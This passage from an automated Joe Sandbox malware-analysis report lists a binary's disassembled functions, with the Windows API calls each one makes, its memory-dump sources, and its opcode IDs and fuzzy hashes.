                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AA5185B21083849BC768EB94CC959DBB3ECEF84351F00492EF685D3191EF79A68C8756
                                                                                                                                                                                                                                                                              Function 00759517 Relevance: 7.7, APIs: 5, Instructions: 159COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 00759534
                                                                                                                                                                                                                                                                              • VariantClear.OLEAUT32 ref: 007595A5
                                                                                                                                                                                                                                                                              • VariantClear.OLEAUT32 ref: 00759604
                                                                                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 00759677
                                                                                                                                                                                                                                                                              • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 007596A2
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Variant$Clear$ChangeInitType
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 4136290138-0
                                                                                                                                                                                                                                                                              • Opcode ID: 392f44f77dfb1578de5aa2dcc1f60ac94148bf84398475f48cde8007afbdfa9d
                                                                                                                                                                                                                                                                              • Instruction ID: 6e407f82ba17c52d67aa3a51bf1f0fdc420b38e9789f50742b56c1311341fec5
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 392f44f77dfb1578de5aa2dcc1f60ac94148bf84398475f48cde8007afbdfa9d
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 285146B5A00219EFCB14CF68C884EAAB7F9FF88310B158559EE09DB350E774E915CB90
                                                                                                                                                                                                                                                                              Function 00769540 Relevance: 7.6, APIs: 5, Instructions: 143COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 007695F3
                                                                                                                                                                                                                                                                              • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 0076961F
                                                                                                                                                                                                                                                                              • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00769677
                                                                                                                                                                                                                                                                              • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0076969C
                                                                                                                                                                                                                                                                              • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 007696A4
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: PrivateProfile$SectionWrite$String
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 2832842796-0
                                                                                                                                                                                                                                                                              • Opcode ID: 00f6a3d04ab36d87fb729cb1e4bd2315dca00aba02d6d88de1443a38604d463c
                                                                                                                                                                                                                                                                              • Instruction ID: 26bdb1d9306c44cdca2cc9032c798987dcf6fc5c99a23f395e6f034f588fcd25
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 00f6a3d04ab36d87fb729cb1e4bd2315dca00aba02d6d88de1443a38604d463c
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6E512C35A00219AFCF15DF54C885E69BBF6FF49314F048098E94AAB3A2CB35ED41CB94
                                                                                                                                                                                                                                                                              Function 00779941 Relevance: 7.6, APIs: 5, Instructions: 143libraryloaderCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • LoadLibraryW.KERNEL32(?,00000000,?), ref: 0077999D
                                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00779A2D
                                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00779A49
                                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00779A8F
                                                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 00779AAF
                                                                                                                                                                                                                                                                                • Part of subcall function 0070F9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00761A02,?,7644E610), ref: 0070F9F1
                                                                                                                                                                                                                                                                                • Part of subcall function 0070F9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00750354,00000000,00000000,?,?,00761A02,?,7644E610,?,00750354), ref: 0070FA18
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 666041331-0
                                                                                                                                                                                                                                                                              • Opcode ID: e423f76e6444cc4e3c54881adb70d812c951f50d933bdf527ff9d2878bda10f9
                                                                                                                                                                                                                                                                              • Instruction ID: 7ce2f4f6fd583b93dedbab6cb3280d4faec9cbbda4f763bdb1a5f98ac92d10b1
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e423f76e6444cc4e3c54881adb70d812c951f50d933bdf527ff9d2878bda10f9
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 42516935606209DFCB10DF68C084CA9BBB1FF09354B15C1A8EA0A9B362D735ED86CB81
                                                                                                                                                                                                                                                                              Function 007875AE Relevance: 7.6, APIs: 5, Instructions: 131windowCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • SetWindowLongW.USER32(00000002,000000F0,?), ref: 0078766B
                                                                                                                                                                                                                                                                              • SetWindowLongW.USER32(?,000000EC,?), ref: 00787682
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 007876AB
                                                                                                                                                                                                                                                                              • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,0076B5BE,00000000,00000000), ref: 007876D0
                                                                                                                                                                                                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 007876FF
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Window$Long$MessageSendShow
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 3688381893-0
                                                                                                                                                                                                                                                                              • Opcode ID: dbe312df8ee6cc1edd607e97089ebcf4c76035d71e9337a77a65ddd7b10f46d9
                                                                                                                                                                                                                                                                              • Instruction ID: b54419ae3f7755156856911398a2eb938bdf237e453701d6704e2b374f49abb7
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: dbe312df8ee6cc1edd607e97089ebcf4c76035d71e9337a77a65ddd7b10f46d9
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C741E335B88504AFD728EF2CCC48FA57B65EB05360F254224F81AA72E0E778ED51D750
                                                                                                                                                                                                                                                                              Function 007223C1 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: _free
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 269201875-0
                                                                                                                                                                                                                                                                              • Opcode ID: 1903fef1c436656d8dd5a0624da2177431a97e9ebd066a3dd24b49a7f07850bb
                                                                                                                                                                                                                                                                              • Instruction ID: 92b5961aeeab3e81d6549c1b75de252609bbea29262eba164c76d98e66c2fbbb
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1903fef1c436656d8dd5a0624da2177431a97e9ebd066a3dd24b49a7f07850bb
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C441E472A00210AFCB20EF78D885A5DB3E5EF88314F154569E515EB392EB38ED42CB80
                                                                                                                                                                                                                                                                              Function 0075224E Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 00752262
                                                                                                                                                                                                                                                                              • PostMessageW.USER32(00000001,00000201,00000001), ref: 0075230E
                                                                                                                                                                                                                                                                              • Sleep.KERNEL32(00000000,?,?,?), ref: 00752316
                                                                                                                                                                                                                                                                              • PostMessageW.USER32(00000001,00000202,00000000), ref: 00752327
                                                                                                                                                                                                                                                                              • Sleep.KERNEL32(00000000,?,?,?,?), ref: 0075232F
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: MessagePostSleep$RectWindow
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 3382505437-0
                                                                                                                                                                                                                                                                              • Opcode ID: 8e0edee32ad58600b67384d279e4e0303b53f90312db6695f2be75ad64e0555d
                                                                                                                                                                                                                                                                              • Instruction ID: 2a2aeb310b1b2c8180cf3099d447e1ba91395abbf1182c43c014dd883f9745eb
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8e0edee32ad58600b67384d279e4e0303b53f90312db6695f2be75ad64e0555d
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DE31BE76A00219EFDB10CFA8CD88ADE3BB5FB05316F104229F925A72D1C3B49D49CB90
                                                                                                                                                                                                                                                                              Function 0076D95F Relevance: 7.6, APIs: 5, Instructions: 93networkfileCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,0076CC63,00000000), ref: 0076D97D
                                                                                                                                                                                                                                                                              • InternetReadFile.WININET(?,00000000,?,?), ref: 0076D9B4
                                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00000000,?,?,?,0076CC63,00000000), ref: 0076D9F9
                                                                                                                                                                                                                                                                              • SetEvent.KERNEL32(?,?,00000000,?,?,?,0076CC63,00000000), ref: 0076DA0D
                                                                                                                                                                                                                                                                              • SetEvent.KERNEL32(?,?,00000000,?,?,?,0076CC63,00000000), ref: 0076DA37
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 3191363074-0
                                                                                                                                                                                                                                                                              • Opcode ID: 963a7c5fa9bca0f45fbd7086cfad3272002be3aee9bd0aa7e35c3f68bd0fa41b
                                                                                                                                                                                                                                                                              • Instruction ID: 62f99021d778e73ee8363605dadd990d9d672d65dfb976414483cbab3eff9b57
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 963a7c5fa9bca0f45fbd7086cfad3272002be3aee9bd0aa7e35c3f68bd0fa41b
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FD314C71A14305EFDB30DFA5D884EAEB7F8EF04354B20842EE946D6150D778AE40DB60
                                                                                                                                                                                                                                                                              Function 007861A5 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00001053,000000FF,?), ref: 007861E4
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00001074,?,00000001), ref: 0078623C
                                                                                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 0078624E
                                                                                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00786259
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 007862B5
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: MessageSend$_wcslen
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 763830540-0
                                                                                                                                                                                                                                                                              • Opcode ID: 4da20ccf84cdf88fcb968673bded25f4fb1679b0ad197913821d17dc05e3e5a7
                                                                                                                                                                                                                                                                              • Instruction ID: aae7c006eecae71fd080e6f1cc8cdef823b941be80dae268709c6021ceac9a50
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4da20ccf84cdf88fcb968673bded25f4fb1679b0ad197913821d17dc05e3e5a7
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 25219675940218AADB21EF54CC88EEE77B9FF04324F10425AFA25EA1C1D778D985CF50
                                                                                                                                                                                                                                                                              Function 0077138D Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • IsWindow.USER32(00000000), ref: 007713AE
                                                                                                                                                                                                                                                                              • GetForegroundWindow.USER32 ref: 007713C5
                                                                                                                                                                                                                                                                              • GetDC.USER32(00000000), ref: 00771401
                                                                                                                                                                                                                                                                              • GetPixel.GDI32(00000000,?,00000003), ref: 0077140D
                                                                                                                                                                                                                                                                              • ReleaseDC.USER32(00000000,00000003), ref: 00771445
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Window$ForegroundPixelRelease
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 4156661090-0
                                                                                                                                                                                                                                                                              • Opcode ID: 3beea4186a2ee63aad13f20d47fe61969e8784823a9839542b99381022167060
                                                                                                                                                                                                                                                                              • Instruction ID: c02a8341e9469c557dcdf8aebc0b212301b1353ad50bba874cfd533d92ee983b
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3beea4186a2ee63aad13f20d47fe61969e8784823a9839542b99381022167060
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CC21A135600208AFDB54EF64CC88EAEB7F6EF48340B14C429E84AD7391DA74AC04CB94
                                                                                                                                                                                                                                                                              Function 0072D13D Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetEnvironmentStringsW.KERNEL32 ref: 0072D146
                                                                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0072D169
                                                                                                                                                                                                                                                                                • Part of subcall function 00723B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00716A79,?,0000015D,?,?,?,?,007185B0,000000FF,00000000,?,?), ref: 00723BC5
                                                                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0072D18F
                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 0072D1A2
                                                                                                                                                                                                                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0072D1B1
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 336800556-0
                                                                                                                                                                                                                                                                              • Opcode ID: b264d79294b5fdec06e54b94240720ea61403a2e0fd4a342d6ced65bb1d3d3c7
                                                                                                                                                                                                                                                                              • Instruction ID: ffd319a74bd65affa679a9df1ee2d9fcc5bfa0cf0ed0ad4f489bceec5686de5f
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b264d79294b5fdec06e54b94240720ea61403a2e0fd4a342d6ced65bb1d3d3c7
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3E01D87260563D7F333136767C4CC7B6B6EDEC2B613260129FC04C2580DA688D11C2B0
                                                                                                                                                                                                                                                                              Function 0072316B Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(0000000A,?,?,0071F64E,0071545F,0000000A,?,00000000,00000000,?,00000000,?,?,?,0000000A,00000000), ref: 00723170
                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 007231A5
                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 007231CC
                                                                                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 007231D9
                                                                                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 007231E2
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: ErrorLast$_free
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 3170660625-0
                                                                                                                                                                                                                                                                              • Opcode ID: 051e5a0a7ec3e666723d1271dbda000b54eae03119adb700d6d40e0dedcfbb63
                                                                                                                                                                                                                                                                              • Instruction ID: 940c26165ed53ae9d11531b90ad2d0aa6c4fc4fb21a87207ee1aef06b0e2c51e
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 051e5a0a7ec3e666723d1271dbda000b54eae03119adb700d6d40e0dedcfbb63
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8401F972784E38BB96222634BC4AE2B165D9BC13717210538F825921C2EE3DCF228155
                                                                                                                                                                                                                                                                              Function 007508FE Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00750831,80070057,?,?,?,00750C4E), ref: 0075091B
